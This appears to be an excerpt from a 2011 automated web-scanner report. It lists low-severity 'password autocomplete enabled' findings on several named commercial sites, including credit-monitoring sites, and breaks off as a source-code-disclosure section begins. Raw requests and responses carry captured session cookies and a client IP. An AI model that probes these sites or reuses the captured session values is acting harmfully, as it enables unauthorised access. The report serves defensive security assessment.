"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

19.35. http://www.infusionsoft.com/pricing  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /pricing

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pricing HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
Referer: http://www.infusionsoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.3.10.1303693620; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:39:20 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:39:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:39:19 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; expires=Thu, 18-Aug-2011 19:26:00 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:39:20 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 29858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<div id="loginPanelContent">
               <form id="loginForm" method="post" action="">
                   <div id="loginFormWrapper">
...[SNIP]...
<dd><input type="password" name="password" id="password" /></dd>
...[SNIP]...

19.36. https://www.myfico.com/Store/Register.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /Store/Register.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4%2c4125%2c39332 HTTP/1.1
Host: www.myfico.com
Connection: keep-alive
Referer: https://www.myfico.com/Store/Register.aspx?Product=2016&trialdays=2016d10&amuc=4,4125,39332
Cache-Control: max-age=0
Origin: https://www.myfico.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQQACTBC=IGNPMHKBMEDEICOGCAIJAOLN; TransactionID=800900002030400007100900002007; LPID=LPID=FairIsaac&LPLogoName=&LPLogoAltName=&LPLink=; Experiment=47=A; amcus=; amcd=f39ebcfe7b8d92f801e54dcbf76037de%2C02%2C1%2CGd%7Czg%7Czj%7Czd%7CJt%7CzK%7CJQ%7CCj%7CIV%2C1%2C7jdq%2C6%2C8C@@c_Homepage%5Dg8%2C7jcW%7C14x%2C1%2C1%7Daeo%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%21aep%5Dg8%2C7jcW%5D0%2C7jcW%5D0%2C7jcW%5D0%2C7jcW@%7C%7C%7C@; __qca=P0-1792545009-1303691708467; cmTPSet=Y; CoreID6=96447579584513036917094; MYFICO=trialdays2016=10&NewPurchaser=yes; PromoCode=; acopendivids=nada; acgroupswithpersist=nada; 90223518_clogin=l=1303691709&v=1&e=1303693603459; NewUser=4/24/2011 7:37:16 PM; fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; ShowCCC=t; SourceProdInfo=prodid=&originid=; 90223518_clogin=l=1303691709&v=1&e=1303693688117; cmRS=&t1=1303691803452&t2=-1&t3=1303691888115&t4=1303691798835&fti=1303691888115&fn=aspnetForm%3A0%3B&ac=0:S&fd=0%3A8%3Actl00%24cphMainContent%24oLoginControl%24Button1%3B&uer=&fu=Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%252c4125%252c39332&pi=Store/Register.aspx&ho=data.coremetrics.com/eluminate%3F&ci=90223518&ul=https%3A//www.myfico.com/Store/Register.aspx%3FProduct%3D2016%26trialdays%3D2016d10%26amuc%3D4%2C4125%2C39332&rf=http%3A//www.myfico.com/Default.aspx&cjen=1
Content-Length: 4879

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTYwNjQ2MjUxNQ9kFgJmD2QWCGYPZBYEZg8WAh4HVmlzaWJsZWhkAgEPFgIfAGdkAgIPZBYGAgEPFgIfAGdkAgUPFgIeBGhyZWYFDS9jc3MvZmljby5jc3NkAgYPFgIfAGhkAgQPZBYMZg9kFg
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Mon, 25 Apr 2011 00:37:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 00:37:56 GMT
Connection: keep-alive
Set-Cookie: NewUser=4/24/2011 7:37:18 PM; path=/
Set-Cookie: fic=vid=197d01359d9645d58263471bdf7625b6&date=20110424073416PM&guid=&lcsource=&learningcenterprogress=&learningcentercompleted=&hasPurchased=false; expires=Mon, 23-Apr-2012 05:00:00 GMT; path=/
Set-Cookie: ShowCCC=t; domain=.myfico.com; path=/
Set-Cookie: SourceProdInfo=prodid=&originid=; path=/
Content-Length: 40429

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" >


<html>
<head><title>
   Please Log In or Create an Account
</title>
<meta http-equiv="X-UA-Comp
...[SNIP]...
<div id="containercon">
       
       
        <form name="aspnetForm" method="post" action="Register.aspx?Product=2016&amp;trialdays=2016d10&amp;amuc=4%2c4125%2c39332" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$cphMainContent$oLoginControl$Password" type="password" id="ctl00_cphMainContent_oLoginControl_Password" size="20" maxlength="30" /></p>
...[SNIP]...
</label>
<input name="ctl00$cphMainContent$txtPassword" type="password" maxlength="30" size="25" id="ctl00_cphMainContent_txtPassword" tabindex="17" onblur="CheckPassword(this);" />
</div>
...[SNIP]...
</label>
<input name="ctl00$cphMainContent$txtPasswordConfirm" type="password" maxlength="30" size="25" id="ctl00_cphMainContent_txtPasswordConfirm" tabindex="18" onblur="CheckPassword2(this);" />
</div>
...[SNIP]...

19.37. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /pcworldconnect/comment_registration?callingurl=http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; JSESSIONID=00497792CB5578F6F5DDC4DEE6210001; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6225


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

19.38. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</script>
               <form action="/component/user/" method="post" id="josForm" name="josForm" class="form-validate">
               
               <table cellpadding="0" cellspacing="0" border="0" width="100%" class="contentpane">
...[SNIP]...
<td>
                       <input class="inputbox required validate-password" type="password" id="password" name="password" size="40" value="" /> *
                   </td>
...[SNIP]...
<td>
                       <input class="inputbox required validate-passverify" type="password" id="password2" name="password2" size="40" value="" /> *
                   </td>
...[SNIP]...

19.39. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
<div class="top">
               <form action="/index.php" method="post" name="form-login" id="form-login" >
<ul class="loginposition">
...[SNIP]...
</label>
<input id="modlgn_passwd" type="password" name="passwd" class="inputbox" size="15" alt="password" />
</li>
...[SNIP]...

19.40. http://www.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet HTTP/1.1
Host: www.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=h05vhh55un4r0t3lzxjaq3m2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc471557=US; domain=securepaynet.net; path=/
Set-Cookie: flag471557=cflag=us; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currency471557=potableSourceStr=USD; domain=securepaynet.net; expires=Mon, 23-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: currencypopin471557=cdisplaypopin=false; domain=securepaynet.net; expires=Tue, 24-Apr-2012 12:42:00 GMT; path=/
Set-Cookie: SplitValue471557=16; domain=securepaynet.net; expires=Mon, 25-Apr-2011 12:42:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=16; domain=securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:42:01 GMT
Content-Length: 156097


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
</div>
<form style="margin: 0;" name="pchFL" id="pchFL" method="POST" action="https://idp.securepaynet.net/login.aspx?isc=kro_2011&ci=9106&amp;prog_id=indextonet&amp;spkey=SPSWNET-M1PWCORPWEB197" onSubmit="return pchj_login_action(this);">
<div class="pch_rite" onMouseOver="pchj_movr('pch_pw','Password');" onMouseOut="pchj_mout('pch_pw');">
...[SNIP]...
</div><input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pch_i_lp inp_iphone"></div>
...[SNIP]...

19.41. https://www.senderscore.org/landing/ppcregistration/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:54 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl; expires=Wed, 25-May-2011 01:30:54 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=ff42t7omks9m225jgdh0f4huh1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<table bgcolor="#8c8c8c" width="464" border="0" cellspacing="0" cellpadding="0">
<form action="/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ" method="post" name="form1" id="form1" onsubmit="this.submit.disabled=true;">                    
<tr>
...[SNIP]...
<td><input name="register_password" type="password" maxlength="50" id="register_password" class="input" value="" style="width:200px; margin:5px 0px 0px 10px;" /></td>
...[SNIP]...
<td><input name="register_password2" type="password" maxlength="50" id="register_password2" class="input" value="" style="width:200px; margin:5px 0px 0px 10px;" /></td>
...[SNIP]...

19.42. https://www.truecredit.com/products/optimizedOrder.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /products/optimizedOrder.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /products/optimizedOrder.jsp?package=Free7DayTrialSingleCMU HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7; op112homepagegum=a05w0i21zj274pm0341w7d5a3; op112homepageliid=a05w0i21zj274pm0341w7d5a3; __utmz=1.1303691678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2001284035.1303691678.1303691678.1303691678.1; __utmc=1; __utmb=1.1.10.1303691678; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_depth%3D1%7C1303693477019%3B%20s_vnum%3D1306266408564%2526vn%253D3%7C1306266408564%3B%20s_visit%3D1%7C1303693853489%3B%20dfa_cookie%3Dtuitruecredit%7C1303693853506%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303691677045'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C%25257C'%252C'1303692053529'%255D%255D%7C1461544853528%3B%20s_invisit%3Dtrue%7C1303693853537%3B%20s_lv%3D1303692053541%7C1398300053541%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303693853541%3B%20s_pv%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%7C1303693853547%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303691677051%3B%20s_ppv%3D100%3B%20SC_LINKS%3Dtc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%255E%255Ehttp%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255Etc%253Atc%253ALanding%2520Page%2520%253A%2520TrueCredit%2520Entry%2520%257C%2520http%253A%252F%252Fpromo.truecredit.com%252FOptimost_Test%252FOptimost_TransUnion_Homepage_10-2010%252FG-ButtonColor%252Fbutton_G1.png%255E%255E%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:30:04 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303695004739
Set-Cookie: TCVISIT=558558858-New-TrueCredit; path=/
Set-Cookie: JSESSIONID=dEs-TS58-_K8; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 81382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Ch
...[SNIP]...
<div align="left">


<form name="optimizedOrder" method="post" action="https://www.truecredit.com/products/optimizedOrderProcess" onSubmit="nextpage=true"><input type="hidden" name="formName" value="optimizedOrder">
...[SNIP]...
<td style="padding-left:5px" align="left"><input type="password" name="password"" size="31" maxlength="15" id="password" class="optimizedField" onkeypress="submitFormOnEnter('optimizedOrder', event); nextpage=true;" ></td>
<td style="padding-left:3px" align="left"><input type="password" name="confirmPassword"" size="31" maxlength="15" id="confirmPassword" class="optimizedField" onkeypress="submitFormOnEnter('optimizedOrder', event); nextpage=true;" ></td>
...[SNIP]...
<td style="padding-left:5px; width:210px;"><input type="password" name="last4SSN"" size="4" maxlength="4" id="last4SSN" class="optimizedField" onkeypress="submitFormOnEnter('optimizedOrder', event); nextpage=true;" ></td>
...[SNIP]...

19.43. https://www.truecredit.com/user/returnUser.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /user/returnUser.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user/returnUser.jsp?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_visit%3D1%7C1303676298592%3B%20s_depth%3D3%7C1303676298595%3B%20dfa_cookie%3Dtuitruecredit%7C1303676298598%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674496699'%255D%252C%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%255D%7C1461527298602%3B%20s_nr%3D1303674498608%7C1306266498608%3B%20s_invisit%3Dtrue%7C1303676298611%3B%20s_lv%3D1303674498614%7C1398282498614%3B%20s_lv_s%3DFirst%2520Visit%7C1303676298614%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303676298619%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674498606%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:48:08 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>Onli
...[SNIP]...
<td width="572">


<form name="memberLogin" method="post" action="https://www.truecredit.com/user/returnUserProcess?cb=credit" onSubmit="nextpage=true"><input type="hidden" name="formName" value="memberLogin">
...[SNIP]...
<td colspan="2"><input type="password" name="password"" size="20" maxlength="15" id="password" onkeypress="submitFormOnEnter('memberLogin', event); nextpage=true;" ></td>
...[SNIP]...

20. Source code disclosure  previous  next
There are 7 instances of this issue:


20.1. http://equifax.com/free30daytrial/css/slatestd-condensed-webfont.woff  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://equifax.com
Path:   /free30daytrial/css/slatestd-condensed-webfont.woff

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /free30daytrial/css/slatestd-condensed-webfont.woff HTTP/1.1
Host: equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
